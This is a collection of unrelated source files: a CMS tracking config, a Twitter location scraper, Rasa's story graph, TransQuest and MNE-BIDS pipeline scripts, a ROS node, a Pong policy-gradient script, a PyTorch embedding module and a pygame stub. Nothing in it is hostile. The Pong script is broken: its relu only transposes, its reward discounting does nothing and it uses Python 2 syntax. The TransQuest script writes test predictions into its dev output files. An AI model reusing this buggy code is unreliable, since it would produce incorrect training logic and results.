refToPSet_ = cms.string('hiRegitMuMixedTripletStepTrajectoryBuilder')
),
clustersToSkip = cms.InputTag('hiRegitMuMixedTripletStepClusters'),
maxNSeeds = cms.uint32(1000000)
)
# fitting: feed new-names
hiRegitMuMixedTripletStepTracks = RecoTracker.IterativeTracking.MixedTripletStep_cff.mixedTripletStepTracks.clone(
AlgorithmName = cms.string('hiRegitMuMixedTripletStep'),
src = 'hiRegitMuMixedTripletStepTrackCandidates',
)
# TRACK SELECTION AND QUALITY FLAG SETTING.
import RecoTracker.FinalTrackSelectors.multiTrackSelector_cfi
import RecoHI.HiTracking.hiMultiTrackSelector_cfi
hiRegitMuMixedTripletStepSelector = RecoHI.HiTracking.hiMultiTrackSelector_cfi.hiMultiTrackSelector.clone(
src = 'hiRegitMuMixedTripletStepTracks',
vertices = cms.InputTag("hiSelectedPixelVertex"),
useAnyMVA = cms.bool(True),
GBRForestLabel = cms.string('HIMVASelectorIter7'),
GBRForestVars = cms.vstring(['chi2perdofperlayer', 'nhits', 'nlayers', 'eta']),
trackSelectors= cms.VPSet(
RecoTracker.FinalTrackSelectors.multiTrackSelector_cfi.looseMTS.clone(
name = 'hiRegitMuMixedTripletStepLoose',
min_nhits = cms.uint32(8)
),
RecoHI.HiTracking.hiMultiTrackSelector_cfi.hiTightMTS.clone(
name = 'hiRegitMuMixedTripletStepTight',
preFilterName = 'hiRegitMuMixedTripletStepLoose',
min_nhits = cms.uint32(8),
useMVA = cms.bool(True),
minMVA = cms.double(-0.2)
),
RecoHI.HiTracking.hiMultiTrackSelector_cfi.hiHighpurityMTS.clone(
name = 'hiRegitMuMixedTripletStep',
preFilterName = 'hiRegitMuMixedTripletStepTight',
min_nhits = cms.uint32(8),
useMVA = cms.bool(True),
minMVA = cms.double(-0.09)
)
) #end of vpset
) #end of clone
from Configuration.Eras.Modifier_trackingPhase1_cff import trackingPhase1
trackingPhase1.toModify(hiRegitMuMixedTripletStepSelector, useAnyMVA = cms.bool(False))
trackingPhase1.toModify(hiRegitMuMixedTripletStepSelector, trackSelectors= cms.VPSet(
RecoTracker.FinalTrackSelectors.multiTrackSelector_cfi.looseMTS.clone(
name = 'hiRegitMuMixedTripletStepLoose',
min_nhits = cms.uint32(8)
),
RecoHI.HiTracking.hiMultiTrackSelector_cfi.hiTightMTS.clone(
name = 'hiRegitMuMixedTripletStepTight',
preFilterName = 'hiRegitMuMixedTripletStepLoose',
min_nhits = cms.uint32(8),
useMVA = cms.bool(False),
minMVA = cms.double(-0.2)
),
RecoHI.HiTracking.hiMultiTrackSelector_cfi.hiHighpurityMTS.clone(
name = 'hiRegitMuMixedTripletStep',
preFilterName = 'hiRegitMuMixedTripletStepTight',
min_nhits = cms.uint32(8),
useMVA = cms.bool(False),
minMVA = cms.double(-0.09)
)
) #end of vpset
)
hiRegitMuonMixedTripletStepTask = cms.Task(hiRegitMuMixedTripletStepClusters,
hiRegitMuMixedTripletStepSeedLayersA,
hiRegitMuMixedTripletStepTrackingRegionsA,
hiRegitMuMixedTripletStepHitDoubletsA,
hiRegitMuMixedTripletStepHitTripletsA,
hiRegitMuMixedTripletStepSeedsA,
hiRegitMuMixedTripletStepSeedLayersB,
hiRegitMuMixedTripletStepTrackingRegionsB,
hiRegitMuMixedTripletStepHitDoubletsB,
hiRegitMuMixedTripletStepHitTripletsB,
hiRegitMuMixedTripletStepSeedsB,
hiRegitMuMixedTripletStepSeeds,
hiRegitMuMixedTripletStepTrackCandidates,
hiRegitMuMixedTripletStepTracks,
hiRegitMuMixedTripletStepSelector)
hiRegitMuonMixedTripletStep = cms.Sequence(hiRegitMuonMixedTripletStepTask)
|
<reponame>orjanj/twitter-incident-visualizer
#!/usr/bin/python
import twitter
class TIVTwitter:
""" Base class for connecting and fetching data from Twitter API. """
def __init__(self, config, db, gmaps):
""" Instance constructor
:return: none
"""
self.db = db
self.gmaps = gmaps
self.config_param = config.getConfigParameter('twitter')
self.API = twitter.Api(consumer_key = self.config_param['consumer_key'],
consumer_secret = self.config_param['consumer_secret'],
access_token_key = self.config_param['access_token_key'],
access_token_secret = self.config_param['access_token_secret'])
# Set up a blacklist (Norwegian word list)
self.blacklist = []
self.buildWordBlacklist()
def validateConnection(self):
"""
Connection validation to Twitter API.
:return: credential information (json)
"""
print(self.API.VerifyCredentials())
def getTweets(self, screen_name, tweet_count):
""" Get Tweet information from Twitter.
:param screen_name: twitter username (string)
:param tweet_count: count of tweets to fetch (int)
:return user_timeline: list of tweets (string)
"""
user_timeline = self.API.GetUserTimeline(screen_name=screen_name, count=tweet_count)
return(user_timeline)
def detectLocation(self, tweet_string):
""" Detect upper case in words and return the words.
:params tweet_string: tweet text (string)
:return words: upper case words (list)
"""
location_list = []
for word in tweet_string.split():
if word[0].isupper() and (word.lower() not in self.blacklist): # TODO: BUG
location_list.append(word)
if word.startswith('v/') and word[2].isupper() and (word[2:].lower() not in self.blacklist): # Example string: v/Bodø
location_list.append(word[2:])
return(location_list)
def buildWordBlacklist(self, filename='config/wordlist_20190123_norsk_ordbank_nob_2005.txt'):
""" Build an word list for blacklisting ordinary Norwegian words to better figure out exact location names. """
with open(filename, "r") as wordlist_file:
self.blacklist = [line.rstrip('\n') for line in wordlist_file]
def getProjectFollowers(self, follower_count):
""" Get our projects followers from Twitter."""
project_friendslist = self.API.GetFriends(count=follower_count)
return(project_friendslist)
def getAccountInfo(self, screen_name):
""" Get Twitter account information.
:param: tweet_data (json)
:return: account_name
:return: account_url
:return: account_text
:return: account_reg_date
:return: account_webpage
:return: account_pic_url
:return: account_verified
"""
user_info = self.API.GetUser(screen_name=screen_name)
return(user_info)
def insertAccountToDB(self, account_object=None):
""" Insertion of account(s) to PostgreSQL DB.
:params account_object: twitter.models.User (class/object)
:return: message success/unsuccess
"""
# Build the Twitter profile URL for the account
account_twitter_url = 'https://twitter.com/' + account_object.screen_name
# Make query ready for insertion
query = "INSERT INTO account(account_name, account_url, account_text, account_reg_date, account_webpage, account_pic_url, account_location, account_screen_name) VALUES(%s, %s, %s, %s, %s, %s, %s, %s)"
values = (account_object.name, account_twitter_url, account_object.description, account_object.created_at, account_object.url, account_object.profile_image_url_https, account_object.location, account_object.screen_name)
# Insert all the values to the database
rows = self.db.execute(query, values)
if rows > 0:
print(rows, "row(s) changed in database.")
def insertTweetsToDB(self, account_id, tweet_place, lat, lng, tweet_objects=None):
""" Insertion of tweets to PostgreSQL DB.
:params: tweet_objects (json)
:return: message success/unsuccess
"""
# Make query ready for insertion
query = "INSERT INTO tweets(account_id, tweet_time, tweet_content, tweet_place, tweet_hashtags, tweet_lat, tweet_long) VALUES(%s, %s, %s, %s, %s, %s, %s)"
values = (account_id, tweet_objects.created_at.strip(), tweet_objects.text.strip(), tweet_place.strip(), tweet_place.strip(), lat, lng)
# Insert all the values to the database
rows = self.db.execute(query, values)
if rows > 0:
print(rows, "row(s) changed in database.") |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import random
from collections import deque, defaultdict
import typing
from rasa_core.domain import Domain
from typing import List, Text, Dict, Optional
from rasa_core.interpreter import RegexInterpreter, NaturalLanguageInterpreter
from rasa_core import utils
if typing.TYPE_CHECKING:
from rasa_core.training_utils.dsl import StoryStep, Story, \
TrainingsDataExtractor
class StoryGraph(object):
def __init__(self, story_steps):
# type: (List[StoryStep]) -> None
self.story_steps = story_steps
self.step_lookup = {s.id: s for s in self.story_steps}
self.ordered_ids = StoryGraph.order_steps(story_steps)
def ordered_steps(self):
# type: () -> List[StoryStep]
"""Returns the story steps ordered by topological order of the DAG."""
return [self.get(step_id) for step_id in self.ordered_ids]
def get(self, step_id):
# type: (Text) -> Optional[StoryStep]
"""Looks a story step up by its id."""
return self.step_lookup.get(step_id)
def build_stories(self,
domain,
max_number_of_trackers=2000):
# type: (Domain, NaturalLanguageInterpreter, bool, int) -> List[Story]
"""Build the stories of a graph."""
from rasa_core.training_utils.dsl import STORY_START, Story
active_trackers = {STORY_START: [Story()]}
rand = random.Random(42)
for step in self.ordered_steps():
if step.start_checkpoint_name() in active_trackers:
# these are the trackers that reached this story step
# and that need to handle all events of the step
incoming_trackers = active_trackers[step.start_checkpoint_name()]
# TODO: we can't use tracker filter here to filter for
# checkpoint conditions since we don't have trackers.
# this code should rather use the code from the dsl.
if max_number_of_trackers is not None:
incoming_trackers = utils.subsample_array(
incoming_trackers, max_number_of_trackers, rand)
events = step.explicit_events(domain)
# need to copy the tracker as multiple story steps might
# start with the same checkpoint and all of them
# will use the same set of incoming trackers
if events:
trackers = [Story(tracker.story_steps + [step])
for tracker in incoming_trackers]
else:
trackers = [] # small optimization
# update our tracker dictionary with the trackers that handled
# the events of the step and that can now be used for further
# story steps that start with the checkpoint this step ended on
if step.end_checkpoint_name() not in active_trackers:
active_trackers[step.end_checkpoint_name()] = []
active_trackers[step.end_checkpoint_name()].extend(trackers)
return active_trackers[None]
def as_story_string(self):
story_content = ""
for step in self.story_steps:
story_content += step.as_story_string(flat=False)
return story_content
@staticmethod
def order_steps(story_steps):
# type: (List[StoryStep]) -> Deque[Text]
"""Topological sort of the steps returning the ids of the steps."""
checkpoints = StoryGraph._group_by_start_checkpoint(story_steps)
graph = {s.id: [other.id
for other in checkpoints[s.end_checkpoint_name()]]
for s in story_steps}
return StoryGraph.topological_sort(graph)
@staticmethod
def _group_by_start_checkpoint(story_steps):
# type: (List[StoryStep]) -> Dict[Text, List[StoryStep]]
"""Returns all the start checkpoint of the steps"""
checkpoints = defaultdict(list)
for step in story_steps:
checkpoints[step.start_checkpoint_name()].append(step)
return checkpoints
@staticmethod
def topological_sort(graph):
"""Creates a topsort of a directed graph. This is an unstable sorting!
The graph should be represented as a dictionary, e.g.:
>>> example_graph = {
... "a": ["b", "c", "d"],
... "b": [],
... "c": ["d"],
... "d": [],
... "e": ["f"],
... "f": []}
>>> StoryGraph.topological_sort(example_graph)
deque([u'e', u'f', u'a', u'c', u'd', u'b'])
"""
GRAY, BLACK = 0, 1
ordered = deque()
unprocessed = set(graph)
visited_nodes = {}
def dfs(node):
visited_nodes[node] = GRAY
for k in graph.get(node, ()):
sk = visited_nodes.get(k, None)
if sk == GRAY:
raise ValueError("Cycle found at node: {}".format(sk))
if sk == BLACK:
continue
unprocessed.discard(k)
dfs(k)
ordered.appendleft(node)
visited_nodes[node] = BLACK
while unprocessed:
dfs(unprocessed.pop())
return ordered
|
import os
import shutil
from sklearn.model_selection import train_test_split
from examples.word_level.common.util import reader, prepare_testdata
from examples.word_level.wmt_2020.en_de.microtransquest_config import TRAIN_PATH, TRAIN_SOURCE_FILE, \
TRAIN_SOURCE_TAGS_FILE, \
TRAIN_TARGET_FILE, \
TRAIN_TARGET_TAGS_FLE, MODEL_TYPE, MODEL_NAME, microtransquest_config, TEST_PATH, TEST_SOURCE_FILE, \
TEST_TARGET_FILE, TEMP_DIRECTORY, TEST_SOURCE_TAGS_FILE, TEST_TARGET_TAGS_FLE, SEED, DEV_TARGET_TAGS_FLE, \
DEV_SOURCE_TAGS_FILE, DEV_PATH, DEV_SOURCE_FILE, DEV_TARGET_FILE, DEV_TARGET_TAGS_FILE_SUB, DEV_SOURCE_TAGS_FILE_SUB
from transquest.algo.word_level.microtransquest.run_model import MicroTransQuestModel
if not os.path.exists(TEMP_DIRECTORY):
os.makedirs(TEMP_DIRECTORY)
raw_train_df = reader(TRAIN_PATH, TRAIN_SOURCE_FILE, TRAIN_TARGET_FILE, TRAIN_SOURCE_TAGS_FILE,
TRAIN_TARGET_TAGS_FLE)
raw_dev_df = reader(DEV_PATH, DEV_SOURCE_FILE, DEV_TARGET_FILE, DEV_SOURCE_TAGS_FILE,
DEV_TARGET_TAGS_FLE)
raw_test_df = reader(TEST_PATH, TEST_SOURCE_FILE, TEST_TARGET_FILE)
test_sentences = prepare_testdata(raw_test_df)
dev_sentences = prepare_testdata(raw_dev_df)
fold_sources_tags = []
fold_targets_tags = []
dev_fold_sources_tags = []
dev_fold_targets_tags = []
for i in range(microtransquest_config["n_fold"]):
if os.path.exists(microtransquest_config['output_dir']) and os.path.isdir(microtransquest_config['output_dir']):
shutil.rmtree(microtransquest_config['output_dir'])
if microtransquest_config["evaluate_during_training"]:
raw_train, raw_eval = train_test_split(raw_train_df, test_size=0.1, random_state=SEED * i)
model = MicroTransQuestModel(MODEL_TYPE, MODEL_NAME, labels=["OK", "BAD"], args=microtransquest_config)
model.train_model(raw_train, eval_data=raw_eval)
model = MicroTransQuestModel(MODEL_TYPE, microtransquest_config["best_model_dir"], labels=["OK", "BAD"],
args=microtransquest_config)
else:
model = MicroTransQuestModel(MODEL_TYPE, MODEL_NAME, labels=["OK", "BAD"], args=microtransquest_config)
model.train_model(raw_train_df)
sources_tags, targets_tags = model.predict(test_sentences, split_on_space=True)
fold_sources_tags.append(sources_tags)
fold_targets_tags.append(targets_tags)
dev_sources_tags, dev_targets_tags = model.predict(dev_sentences, split_on_space=True)
dev_fold_sources_tags.append(dev_sources_tags)
dev_fold_targets_tags.append(dev_targets_tags)
source_predictions = []
for sentence_id in range(len(test_sentences)):
majority_prediction = []
predictions = []
for fold_prediction in fold_sources_tags:
predictions.append(fold_prediction[sentence_id])
sentence_length = len(predictions[0])
for word_id in range(sentence_length):
word_prediction = []
for prediction in predictions:
word_prediction.append(prediction[word_id])
majority_prediction.append(max(set(word_prediction), key=word_prediction.count))
source_predictions.append(majority_prediction)
with open(os.path.join(TEMP_DIRECTORY, TEST_SOURCE_TAGS_FILE), 'w') as f:
for _list in source_predictions:
for _string in _list:
f.write(str(_string) + ' ')
f.write(str('\n'))
target_predictions = []
for sentence_id in range(len(test_sentences)):
majority_prediction = []
predictions = []
for fold_prediction in fold_targets_tags:
predictions.append(fold_prediction[sentence_id])
sentence_length = len(predictions[0])
for word_id in range(sentence_length):
word_prediction = []
for prediction in predictions:
word_prediction.append(prediction[word_id])
majority_prediction.append(max(set(word_prediction), key=word_prediction.count))
target_predictions.append(majority_prediction)
with open(os.path.join(TEMP_DIRECTORY, TEST_TARGET_TAGS_FLE), 'w') as f:
for _list in target_predictions:
for _string in _list:
f.write(str(_string) + ' ')
f.write(str('\n'))
# --------- Dev Predictions -----------
dev_source_predictions = []
for sentence_id in range(len(dev_sentences)):
majority_prediction = []
predictions = []
for fold_prediction in dev_fold_sources_tags:
predictions.append(fold_prediction[sentence_id])
sentence_length = len(predictions[0])
for word_id in range(sentence_length):
word_prediction = []
for prediction in predictions:
word_prediction.append(prediction[word_id])
majority_prediction.append(max(set(word_prediction), key=word_prediction.count))
dev_source_predictions.append(majority_prediction)
with open(os.path.join(TEMP_DIRECTORY, DEV_SOURCE_TAGS_FILE_SUB), 'w') as f:
for _list in source_predictions:
for _string in _list:
f.write(str(_string) + ' ')
f.write(str('\n'))
dev_target_predictions = []
for sentence_id in range(len(dev_sentences)):
majority_prediction = []
predictions = []
for fold_prediction in dev_fold_targets_tags:
predictions.append(fold_prediction[sentence_id])
sentence_length = len(predictions[0])
for word_id in range(sentence_length):
word_prediction = []
for prediction in predictions:
word_prediction.append(prediction[word_id])
majority_prediction.append(max(set(word_prediction), key=word_prediction.count))
dev_target_predictions.append(majority_prediction)
with open(os.path.join(TEMP_DIRECTORY, DEV_TARGET_TAGS_FILE_SUB), 'w') as f:
for _list in target_predictions:
for _string in _list:
f.write(str(_string) + ' ')
f.write(str('\n'))
|
<reponame>dengemann/mne-bids-pipeline
"""
=================================
13. Group average on source level
=================================
Source estimates are morphed to the ``fsaverage`` brain.
"""
import itertools
import logging
import mne
from mne.parallel import parallel_func
from mne_bids import BIDSPath
import config
from config import gen_log_message, on_error, failsafe_run
logger = logging.getLogger('mne-bids-pipeline')
def morph_stc(subject, session=None):
bids_path = BIDSPath(subject=subject,
session=session,
task=config.get_task(),
acquisition=config.acq,
run=None,
recording=config.rec,
space=config.space,
datatype=config.get_datatype(),
root=config.get_deriv_root(),
check=False)
fs_subject = config.get_fs_subject(subject)
fs_subjects_dir = config.get_fs_subjects_dir()
morphed_stcs = []
if isinstance(config.conditions, dict):
conditions = list(config.conditions.keys())
else:
conditions = config.conditions
for condition in conditions:
method = config.inverse_method
cond_str = config.sanitize_cond_name(condition)
inverse_str = method
hemi_str = 'hemi' # MNE will auto-append '-lh' and '-rh'.
morph_str = 'morph2fsaverage'
fname_stc = bids_path.copy().update(
suffix=f'{cond_str}+{inverse_str}+{hemi_str}')
fname_stc_fsaverage = bids_path.copy().update(
suffix=f'{cond_str}+{inverse_str}+{morph_str}+{hemi_str}')
stc = mne.read_source_estimate(fname_stc)
morph = mne.compute_source_morph(
stc, subject_from=fs_subject, subject_to='fsaverage',
subjects_dir=fs_subjects_dir)
stc_fsaverage = morph.apply(stc)
stc_fsaverage.save(fname_stc_fsaverage)
morphed_stcs.append(stc_fsaverage)
del fname_stc, fname_stc_fsaverage
return morphed_stcs
@failsafe_run(on_error=on_error)
def main():
"""Run group average in source space"""
msg = 'Running Step 13: Grand-average source estimates'
logger.info(gen_log_message(step=13, message=msg))
if not config.run_source_estimation:
msg = ' … skipping: run_source_estimation is set to False.'
logger.info(gen_log_message(step=13, message=msg))
return
mne.datasets.fetch_fsaverage(subjects_dir=config.get_fs_subjects_dir())
parallel, run_func, _ = parallel_func(morph_stc, n_jobs=config.N_JOBS)
all_morphed_stcs = parallel(run_func(subject, session)
for subject, session in
itertools.product(config.get_subjects(),
config.get_sessions()))
all_morphed_stcs = [morphed_stcs for morphed_stcs, subject in
zip(all_morphed_stcs, config.get_subjects())]
mean_morphed_stcs = map(sum, zip(*all_morphed_stcs))
subject = 'average'
# XXX to fix
if config.get_sessions():
session = config.get_sessions()[0]
else:
session = None
bids_path = BIDSPath(subject=subject,
session=session,
task=config.get_task(),
acquisition=config.acq,
run=None,
processing=config.proc,
recording=config.rec,
space=config.space,
datatype=config.get_datatype(),
root=config.get_deriv_root(),
check=False)
if isinstance(config.conditions, dict):
conditions = list(config.conditions.keys())
else:
conditions = config.conditions
for condition, this_stc in zip(conditions, mean_morphed_stcs):
this_stc /= len(all_morphed_stcs)
method = config.inverse_method
cond_str = config.sanitize_cond_name(condition)
inverse_str = method
hemi_str = 'hemi' # MNE will auto-append '-lh' and '-rh'.
morph_str = 'morph2fsaverage'
fname_stc_avg = bids_path.copy().update(
suffix=f'{cond_str}+{inverse_str}+{morph_str}+{hemi_str}')
this_stc.save(fname_stc_avg)
msg = 'Completed Step 13: Grand-average source estimates'
logger.info(gen_log_message(step=13, message=msg))
if __name__ == '__main__':
main()
|
<gh_stars>10-100
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import rospy
import tf
import math
from actionlib_msgs.msg import GoalID
from geometry_msgs.msg import PoseWithCovarianceStamped
from geometry_msgs.msg import PoseStamped
from visualization_msgs.msg import Marker
class VisualizationClass:
def __init__(self):
rospy.init_node('ninebot_visualization', anonymous=True)
self.portable_number = rospy.get_param('~portable_number', '1')
self.portable_frame = rospy.get_param('~portable_frame_id', 'pot_1')
self.global_frame = rospy.get_param('~global_frame_id', 'map1')
self.base_frame = rospy.get_param('~base_frame_id', 'base_footprint1')
self.server_frame = rospy.get_param('~server_frame_id', 'server_map')
self.marker_pub1 = rospy.Publisher('/target_s_' + self.portable_frame, Marker, queue_size=10)
self.marker_pub2 = rospy.Publisher('target_' + self.portable_frame, Marker, queue_size=10)
self.start_pub = rospy.Publisher('initialpose', PoseWithCovarianceStamped, queue_size=10)
self.goal_pub = rospy.Publisher('move_base_simple/goal', PoseStamped, queue_size=10)
rospy.Subscriber('move_base_simple/goal', PoseStamped, self.callback_goal, queue_size=10)
rospy.Subscriber('move_base/cancel', GoalID, self.callback_cancel, queue_size=10)
rospy.Subscriber('/initialpose', PoseWithCovarianceStamped, self.callback_rviz_start, queue_size=10)
rospy.Subscriber('/move_base_simple/goal', PoseStamped, self.callback_rviz_goal, queue_size=10)
rate = rospy.Rate(10) # 10hz
listener = tf.TransformListener()
broadcaster = tf.TransformBroadcaster()
while not rospy.is_shutdown():
try:
(point, quate) = listener.lookupTransform(self.global_frame, self.base_frame, rospy.Time(0))
broadcaster.sendTransform((point[0], point[1], 0.0), \
(quate[0], quate[1], quate[2], quate[3]), \
rospy.Time.now(), self.portable_frame, self.server_frame)
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException): pass
rate.sleep()
def callback_goal(self, data):
marker = Marker()
marker.id = self.portable_number
marker.header.stamp = rospy.Time.now()
marker.type = 3 #cylinder
marker.action = 0 #add
marker.scale.x = 0.2
marker.scale.y = 0.2
marker.scale.z = 1.0
marker.color.r = 1
marker.color.g = 1
marker.color.b = 1
marker.color.a = 1.0
marker.lifetime = rospy.Duration()
marker.pose.position = data.pose.position
marker.pose.orientation = data.pose.orientation
marker.pose.position.z = 0.3
marker.header.frame_id = self.server_frame
self.marker_pub1.publish(marker)
marker.header.frame_id = self.global_frame
self.marker_pub2.publish(marker)
def callback_cancel(self, data):
marker = Marker()
marker.id = self.portable_number
marker.action = 2 #delete
self.marker_pub1.publish(marker)
self.marker_pub2.publish(marker)
def callback_rviz_start(self, data):
data.header.frame_id = self.global_frame
self.start_pub.publish(data)
def callback_rviz_goal(self, data):
data.header.frame_id = self.global_frame
self.goal_pub.publish(data)
if __name__ == '__main__':
try:
VisualizationClass()
except rospy.ROSInterruptException:
rospy.loginfo("ninebot_visualization node finished.") |
import gym
import np
import numpy
# hyperparameters
episode_number = 0
batch_size = 10
gamma = 0.99 # discount factor for reward
decay_rate = 0.99
num_hidden_layer_neurons = 200
n = 80
input_dimensions = 80 * 80
learning_rate = 1e-4
def average_color(a,b,c,d,i):
return (int(a[0]) + int(b[0]) + int(c[0]) + int(d[0])) / 4
# [y for y in [x for x in a]
# from 160x160 to 80x80
# observation :: [160,160,3]
# output :: [80,80,3]
def downsample(observation):
output = np.zeros((n,n,3))
for x in range(0,n):
for y in range(0,n):
a = observation[2*x,2*y]
b = observation[2*x,2*y+1]
c = observation[2*x+1,2*y]
d = observation[2*x+1,2*y+1]
output[x,y]= [
average_color(a,b,c,d,0),
average_color(a,b,c,d,1),
average_color(a,b,c,d,2)
]
return output
# from 0.33 to 0, from 0.66 to 1
# observation :: [80,80,3]
# output :: [80,80]
def remove_color(observation):
output = np.zeros((n,n))
for x in range(0,n):
for y in range(0,n):
color = observation[x,y]
grayscale = (color[0] + color[1] + color[2]) / 3
output[x,y] = grayscale
return output
# observation :: [80,80]
# output :: [80,80]
def remove_background(observation):
return observation
# input: [6400,1]
# output: [1,6400]
def relu(input):
return numpy.transpose(input)
def sigmoid(x):
return 1/(1 + np.exp(-x))
def choose_action(up_probability):
return int(up_probability + 0.5)
def discount_with_rewards(episode_gradient_log_ps, episode_rewards, gamma):
return episode_gradient_log_ps
#return episode_gradient_log_ps_discounted
def preprocess_observations(input_observation, prev_processed_observation, input_dimensions):
""" convert the 210x160x3 uint8 frame into a 6400 float vector """
processed_observation = input_observation[35:195] # crop
processed_observation = downsample(processed_observation)
processed_observation = remove_color(processed_observation)
processed_observation = remove_background(processed_observation)
# Convert from 80 x 80 matrix to 1600 x 1 matrix
processed_observation = processed_observation.astype(np.float).ravel()
distinct = []
for x in processed_observation:
if x not in distinct:
distinct.append(x)
for x in distinct:
print x
processed_observation[processed_observation != 0] = 1 # everything else (paddles, ball) just set to 1
# subtract the previous frame from the current one so we are only processing on changes in the game
if prev_processed_observation is not None:
input_observation = processed_observation - prev_processed_observation
else:
input_observation = np.zeros(input_dimensions)
# store the previous frame so we can subtract from it next time
prev_processed_observations = processed_observation
return input_observation, prev_processed_observations
def apply_neural_nets(observation_matrix, weights):
""" Based on the observation_matrix and weights, compute the new hidden layer values and the new output layer values"""
hidden_layer_values = np.dot(weights['1'], observation_matrix)
hidden_layer_values = relu(hidden_layer_values)
output_layer_values = np.dot(weights['2'], hidden_layer_values)
output_layer_values = sigmoid(output_layer_values)
return hidden_layer_values, output_layer_values
def compute_gradient(gradient_log_p, hidden_layer_values, observation_values, weights):
""" See here: http://neuralnetworksanddeeplearning.com/chap2.html"""
delta_L = gradient_log_p
dC_dw2 = np.dot(hidden_layer_values.T, delta_L).ravel()
delta_l2 = np.outer(delta_L, weights['2'])
delta_l2 = relu(delta_l2)
dC_dw1 = np.dot(delta_l2.T, observation_values)
return {
'1': dC_dw1,
'2': dC_dw2
}
def update_weights(weights, expectation_g_squared, g_dict, decay_rate, learning_rate):
""" See here: http://sebastianruder.com/optimizing-gradient-descent/index.html#rmsprop"""
epsilon = 1e-5
for layer_name in weights.keys():
g = g_dict[layer_name]
expectation_g_squared[layer_name] = decay_rate * expectation_g_squared[layer_name] + (1 - decay_rate) * g**2
weights[layer_name] += (learning_rate * g)/(np.sqrt(expectation_g_squared[layer_name] + epsilon))
g_dict[layer_name] = np.zeros_like(weights[layer_name]) # reset batch gradient buffer
def main():
env = gym.make("Pong-v0")
observation = env.reset() # This gets us the image
episode_number = 0
reward_sum = 0
running_reward = None
prev_processed_observations = None
weights = {
'1': np.random.randn(num_hidden_layer_neurons, input_dimensions) / np.sqrt(input_dimensions),
'2': np.random.randn(num_hidden_layer_neurons) / np.sqrt(num_hidden_layer_neurons)
}
# To be used with rmsprop algorithm (http://sebastianruder.com/optimizing-gradient-descent/index.html#rmsprop)
expectation_g_squared = {}
g_dict = {}
for layer_name in weights.keys():
expectation_g_squared[layer_name] = np.zeros_like(weights[layer_name])
g_dict[layer_name] = np.zeros_like(weights[layer_name])
episode_hidden_layer_values, episode_observations, episode_gradient_log_ps, episode_rewards = [], [], [], []
while True:
env.render()
processed_observations, prev_processed_observations = preprocess_observations(observation, prev_processed_observations, input_dimensions)
hidden_layer_values, up_probability = apply_neural_nets(processed_observations, weights)
episode_observations = numpy.append(episode_observations, processed_observations)
episode_hidden_layer_values.append(hidden_layer_values)
action = choose_action(up_probability)
# carry out the chosen action
observation, reward, done, info = env.step(action)
reward_sum += reward
episode_rewards.append(reward)
# see here: http://cs231n.github.io/neural-networks-2/#losses
fake_label = 1 if action == 2 else 0
loss_function_gradient = fake_label - up_probability
episode_gradient_log_ps.append(loss_function_gradient)
# Combine the following values for the episode
episode_hidden_layer_values = np.vstack(episode_hidden_layer_values)
episode_observations = np.vstack(episode_observations)
episode_gradient_log_ps = np.vstack(episode_gradient_log_ps)
episode_rewards = np.vstack(episode_rewards)
# Tweak the gradient of the log_ps based on the discounted rewards
episode_gradient_log_ps_discounted = discount_with_rewards(episode_gradient_log_ps, episode_rewards, gamma)
gradient = compute_gradient(
episode_gradient_log_ps_discounted,
episode_hidden_layer_values,
episode_observations,
weights
)
if episode_number % batch_size == 0:
update_weights(weights, expectation_g_squared, g_dict, decay_rate, learning_rate)
main()
|
<reponame>takase/alone_seq2seq
import math
import os
import torch
import torch.nn as nn
from torch.nn.parameter import Parameter
class OneEmbed(nn.Module):
def __init__(self, num_embeddings, embedding_dim, padding_idx=None, one_emb_type='binary', dropout=0.5, std=1.0, codenum=64, codebooknum=8, layernum=1, interdim=0, relu_dropout=0.1, mask_file=''):
super(OneEmbed, self).__init__()
self.num_embeddings = num_embeddings
self.embedding_dim = embedding_dim
self.one_emb_type = one_emb_type
self.layernum = layernum
self.relu_dropout = relu_dropout
if padding_idx is not None:
if padding_idx > 0:
assert padding_idx < self.num_embeddings, 'Padding_idx must be within num_embeddings'
elif padding_idx < 0:
assert padding_idx >= -self.num_embeddings, 'Padding_idx must be within num_embeddings'
padding_idx = self.num_embeddings + padding_idx
self.padding_idx = padding_idx
self.weight = Parameter(torch.Tensor(1, embedding_dim)) #embedding for all tokens
if interdim == 0:
interdim = embedding_dim
self.weight_matrices = nn.ParameterList([nn.Parameter(torch.Tensor(embedding_dim, interdim)) if i+1 == self.layernum else (nn.Parameter(torch.Tensor(interdim, embedding_dim)) if i == 0 else nn.Parameter(torch.Tensor(interdim, interdim))) for i in range(self.layernum)])
if os.path.isfile(mask_file):
self.mask = torch.load(mask_file)
else:
if self.one_emb_type == 'binary':
prob = torch.Tensor(codenum, embedding_dim)
nn.init.constant_(prob, (1 - dropout ** (1.0 / codebooknum)))
self.masklist = [torch.bernoulli(prob) for _ in range(codebooknum)]
else:
mean_m = torch.zeros(codenum, embedding_dim)
std_m = torch.Tensor(codenum, embedding_dim)
nn.init.constant_(std_m, std * (codebooknum ** -0.5))
self.masklist = [torch.normal(mean_m, std_m) for _ in range(codebooknum)]
self.hash2mask = torch.randint(0, codenum, (num_embeddings, codebooknum), dtype=torch.long)
self.mask = self.construct_mask2each_token() #mask for each token
dirname = '/'.join(mask_file.split('/')[:-1])
if not os.path.isdir(dirname):
os.makedirs(dirname)
torch.save(self.mask, mask_file)
def construct_mask2each_token(self):
mask = []
for i in range(self.hash2mask.size(1)):
token_hash = self.hash2mask[:, i]
mask.append(nn.functional.embedding(token_hash, self.masklist[i], padding_idx=self.padding_idx))
mask = sum(mask)
if self.one_emb_type == 'binary':
mask.clamp_(0, 1)
return mask
def construct_matrix_for_output_layer(self):
vocab_vec = self.mask.new(range(self.num_embeddings)).long()
matrix = self.forward(vocab_vec, dropout=0)
return matrix
def forward(self, input, dropout=None):
if input.is_cuda and not self.mask.is_cuda:
self.mask = self.mask.cuda()
relu_dropout = self.relu_dropout if dropout is None else dropout
each_token_mask = nn.functional.embedding(input, self.mask, padding_idx=self.padding_idx)
embed = each_token_mask * self.weight.expand_as(each_token_mask)
for i in range(self.layernum):
embed = nn.functional.linear(embed, self.weight_matrices[i])
if i+1 != self.layernum:
embed = nn.functional.relu(embed)
embed = nn.functional.dropout(embed, p=relu_dropout, training=self.training)
return embed
|
import pygame
from sys import exit
width=360
height=515
fps = 30
black = (0,0,0)
bar_img_active_horizontal = pygame.image.load('bar.png')
bar_img_active_vertical = pygame.transform.rotate(bar_img_active_horizontal,90)
